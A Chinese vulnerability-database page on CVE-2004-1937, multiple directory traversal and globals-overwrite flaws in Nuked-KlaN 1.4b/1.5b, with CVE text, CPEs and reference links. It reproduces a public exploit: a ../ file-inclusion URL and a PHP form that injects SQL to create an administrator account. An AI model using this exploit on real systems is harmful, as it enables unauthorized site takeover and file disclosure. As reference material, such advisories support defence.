CVE-2004-1937
CVSS5.0
发布时间 :2004-12-31 00:00:00
修订时间 :2016-10-17 23:03:20
NMCOE    

[原文]Multiple directory traversal vulnerabilities in Nuked-KlaN 1.4b and 1.5b allow remote attackers to read or include arbitrary files via .. sequences in (1) the user_langue parameter to index.php or (2) the langue parameter to update.php, or modify arbitrary GLOBAL variables by causing globals.php to be loaded before conf.inc.php via (3) .. sequences in the file parameter with the page parameter set to globals, or (4) ../globals.php in the user_langue parameter, as demonstrated by modifying $nuked[prefix] in the Suggest module.


[CNNVD]Nuked-Klan多个漏洞(CNNVD-200412-347)

        Nuked-KlaN 1.4b和1.5b版本存在多个目录遍历漏洞。远程攻击者可以借助(1)index.php的user_langue参数或 (2)update.php的langue参数或修改 任意GLOBAL变量导致conf.inc.php之前globals.php下载(3)file参数中带有全域变量page的..序列或(4)user_langue的../globals.php in the parameter读取或包含任意文件。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:nuked-klan:nuked-klan:1.2_beta
cpe:/a:nuked-klan:nuked-klan:1.5
cpe:/a:nuked-klan:nuked-klan:1.4
cpe:/a:nuked-klan:nuked-klan:1.3
cpe:/a:nuked-klan:nuked-klan:1.2
cpe:/a:nuked-klan:nuked-klan:1.5_sp2
cpe:/a:nuked-klan:nuked-klan:1.3_beta

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1937
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1937
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-347
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=108222826225823&w=2
(UNKNOWN)  BUGTRAQ  20040417 [SCSA-028] Nuked-Klan Multiple Vulnerabilities
http://www.phpsecure.info/v2/tutos/frog/Nuked-KlaN.txt
(PATCH)  MISC  http://www.phpsecure.info/v2/tutos/frog/Nuked-KlaN.txt
http://www.securityfocus.com/bid/10104
(PATCH)  BID  10104
http://xforce.iss.net/xforce/xfdb/15843
(UNKNOWN)  XF  nuked-klan-file-include(15843)
http://xforce.iss.net/xforce/xfdb/15844
(UNKNOWN)  XF  nuked-klan-configurtion-corruption(15844)

- 漏洞信息

Nuked-Klan多个漏洞
中危 路径遍历
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        Nuked-KlaN 1.4b和1.5b版本存在多个目录遍历漏洞。远程攻击者可以借助(1)index.php的user_langue参数或 (2)update.php的langue参数或修改 任意GLOBAL变量导致conf.inc.php之前globals.php下载(3)file参数中带有全域变量page的..序列或(4)user_langue的../globals.php in the parameter读取或包含任意文件。

- 公告与补丁

        The vendor has reportedly released a fix for these issues, though this has not been confirmed by Symantec. Affected users should contact the vendor for more information.
        ---
        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (23988)

Nuked-Klan 1.x Multiple Vulnerabilities (EDBID:23988)
php webapps
2004-04-12 Verified
0 frog
N/A [点击下载]
source: http://www.securityfocus.com/bid/10104/info

Nuked-Klan is prone to multiple vulnerabilities. These issues include information disclosure via inclusion of local files, an issue that may permit remote attackers to corrupt configuration files and an SQL injection vulnerability.

- To include a local file:

http://www.example.com/index.php?user_langue=../../../../../file/to/view

- Create admin (overwriting GLOBALS) :

-------------------------------------------------------

<html>
<head>
<title>Nuked-KlaN b1.5 Create Admin</title>
</head>
<body>
<?
function ascii_sql($str) {
for ($i=0;$i < strlen($str);$i++) {
if ($i == strlen($str)-1){
$ascii_char.=ord(substr($str,$i));
}else{
$ascii_char.=ord(substr($str,$i)).',';
}
}
return $ascii_char;
}

if (isset($_POST["submit"])){

echo "<script>url='".$target."/index.php?
file=Suggest&op=add_sug&user_langue=../globals.php&nuked[prefix]=nuked_users%20
(id,pseudo,pass,niveau)%20VALUES%20(12345,char(".ascii_sql($_POST
["pseudo"])."),md5(char(".ascii_sql($_POST
["pass"]).")),9)/*&module=Gallery';window.open(url);</script>";
echo "<br><br><br><br>Admin should have been created.";

}else{
?>

<form method="POST" action="<? echo $PHP_SELF; ?>">
<b>Target :</b> <input type="text" name="target" value="http://"><br>
<b>Admin Nick :</b> <input type="text" name="pseudo"><br>
<b>Admin Pass :</b> <input type="text" name="pass"><br>
<input type="submit" name="submit" value="Create Admin">
</form>
<?
}
?>
</body>
</html>
-------------------------------------------------------		

- 漏洞信息

52890
Nuked-Klan index.php user_langue Parameter Traversal Arbitrary File Access
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality
Exploit Public

- 漏洞描述

- 时间线

2004-04-17 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站